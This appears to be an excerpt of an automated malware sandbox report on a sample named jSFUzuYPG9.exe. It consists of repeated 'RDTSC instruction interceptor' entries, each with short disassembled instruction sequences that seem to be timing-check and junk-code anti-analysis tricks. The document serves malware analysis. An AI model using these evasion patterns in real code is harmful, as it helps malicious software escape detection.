Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EC04F1 second address: EC04F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EC12F5 second address: EC1321 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4BA0D39726h 0x00000008 jmp 00007F4BA0D3970Dh 0x0000000d jmp 00007F4BA0D39713h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EC1321 second address: EC1327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EBF2F6 second address: EBF305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F4BA0D39706h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EBF305 second address: EBF30B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EBF30B second address: EBF311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EC685B second address: EC686C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3F156h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EC6B1D second address: EC6B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F4BA0D39706h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EC6B2D second address: EC6B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED10D2 second address: ED10D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED10D6 second address: ED10DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED10DA second address: ED10EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D3970Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED10EF second address: ED10F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED10F3 second address: ED1109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39712h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED1109 second address: ED110F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED2BE2 second address: ED2BE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED2BE7 second address: ED2BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 js 00007F4BA0D3F15Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED2D3B second address: ED2D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39714h 0x00000008 jnc 00007F4BA0D39706h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED534C second address: ED5352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED5352 second address: ED5356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED54CE second address: ED54DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F4BA0D3F156h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED54DB second address: ED54E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED54E5 second address: ED54F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F4BA0D3F15Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED9D18 second address: ED9D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007F4BA0D3970Ch 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED9D34 second address: ED9D3E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: ED9D3E second address: ED9D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EDF19E second address: EDF1B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F4BA0D3F158h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E08CF1 second address: E08CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EE8867 second address: EE8882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F4BA0D3F156h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EE8882 second address: EE8886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EEF95D second address: EEF964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EEE31B second address: EEE325 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: EF4081 second address: EF408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F4BA0D3F156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F00124 second address: F00134 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4BA0D39706h 0x00000008 jo 00007F4BA0D39706h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F00134 second address: F0016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007F4BA0D3F165h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4BA0D3F166h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F0D65B second address: F0D65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F2549A second address: F254A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D3F172h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F24524 second address: F24536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F24679 second address: F24681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F2493F second address: F24945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F24945 second address: F24949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F24D77 second address: F24D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39716h 0x0000000d jng 00007F4BA0D39706h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F24EC3 second address: F24EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4BA0D3F166h 0x0000000f pop eax 0x00000010 jc 00007F4BA0D3F15Eh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 je 00007F4BA0D3F156h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jp 00007F4BA0D3F156h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F24EFE second address: F24F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jne 00007F4BA0D3970Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F2519E second address: F251A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F251A2 second address: F251C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39716h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F4BA0D39706h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F26B57 second address: F26B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F26B5D second address: F26B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F28388 second address: F2838E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F2823A second address: F28240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F2ABD3 second address: F2ABD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: F2C4BD second address: F2C4F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39716h 0x00000007 jmp 00007F4BA0D39717h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F4BA0D39706h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E50EC5 second address: E50EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53702BC second address: 53702D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39711h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53702D1 second address: 53702EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53702EF second address: 53702F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53702F5 second address: 5370338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4BA0D3F167h 0x00000009 sbb cl, 0000000Eh 0x0000000c jmp 00007F4BA0D3F169h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov bx, si 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370338 second address: 5370374 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 66419DA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4BA0D39712h 0x0000000f add ch, FFFFFFB8h 0x00000012 jmp 00007F4BA0D3970Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c pushad 0x0000001d pushad 0x0000001e mov dh, cl 0x00000020 push edi 0x00000021 pop eax 0x00000022 popad 0x00000023 pushad 0x00000024 mov ax, dx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53906A1 second address: 53906B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53906B0 second address: 53906DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov bl, cl 0x0000000d mov di, 59FCh 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53906DC second address: 5390706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4BA0D3F15Dh 0x0000000a and si, A556h 0x0000000f jmp 00007F4BA0D3F161h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390706 second address: 539076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39717h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e jmp 00007F4BA0D39712h 0x00000013 xchg eax, esi 0x00000014 jmp 00007F4BA0D39710h 0x00000019 push eax 0x0000001a jmp 00007F4BA0D3970Bh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4BA0D39715h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 539076D second address: 53907CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4BA0D3F15Ch 0x00000013 add si, D5C8h 0x00000018 jmp 00007F4BA0D3F15Bh 0x0000001d popfd 0x0000001e mov di, si 0x00000021 popad 0x00000022 nop 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F4BA0D3F15Eh 0x0000002c sub cx, D828h 0x00000031 jmp 00007F4BA0D3F15Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53907CC second address: 5390814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4BA0D39712h 0x0000000f sbb cx, A5B8h 0x00000014 jmp 00007F4BA0D3970Bh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390814 second address: 5390826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390826 second address: 5390849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4BA0D3970Bh 0x00000012 pop eax 0x00000013 movsx ebx, ax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390849 second address: 539085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53908BC second address: 53908C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53908C0 second address: 53908D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53908D9 second address: 53908DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53908DF second address: 53908E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 539097D second address: 5390987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 44FADD78h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390987 second address: 538002B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov ax, 42FDh 0x0000000f pushfd 0x00000010 jmp 00007F4BA0D3F15Ah 0x00000015 or ch, FFFFFFD8h 0x00000018 jmp 00007F4BA0D3F15Bh 0x0000001d popfd 0x0000001e popad 0x0000001f retn 0004h 0x00000022 nop 0x00000023 cmp eax, 00000000h 0x00000026 setne al 0x00000029 jmp 00007F4BA0D3F152h 0x0000002b xor ebx, ebx 0x0000002d test al, 01h 0x0000002f jne 00007F4BA0D3F157h 0x00000031 sub esp, 04h 0x00000034 mov dword ptr [esp], 0000000Dh 0x0000003b call 00007F4BA543C74Bh 0x00000040 mov edi, edi 0x00000042 jmp 00007F4BA0D3F15Dh 0x00000047 xchg eax, ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b call 00007F4BA0D3F163h 0x00000050 pop ecx 0x00000051 movsx edi, ax 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 538002B second address: 538007B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, DA3Ah 0x00000011 mov edi, 5DC06006h 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4BA0D39719h 0x00000020 and cl, 00000066h 0x00000023 jmp 00007F4BA0D39711h 0x00000028 popfd 0x00000029 push esi 0x0000002a pop edi 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e mov ebx, esi 0x00000030 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 538007B second address: 53800BF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4BA0D3F166h 0x00000008 sbb eax, 60E36C38h 0x0000000e jmp 00007F4BA0D3F15Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4BA0D3F160h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53800BF second address: 53800C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53800C5 second address: 53800CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53800CB second address: 5380125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 mov edi, eax 0x00000017 jmp 00007F4BA0D39710h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007F4BA0D39717h 0x00000025 pop esi 0x00000026 mov dh, D0h 0x00000028 popad 0x00000029 mov ax, 2C21h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 movzx esi, dx 0x00000033 mov bl, 7Ah 0x00000035 popad 0x00000036 xchg eax, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380125 second address: 5380129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380129 second address: 538013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 538013C second address: 5380154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F164h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380154 second address: 5380158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53801AE second address: 53801CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53801CB second address: 53801D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53801D1 second address: 53801D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
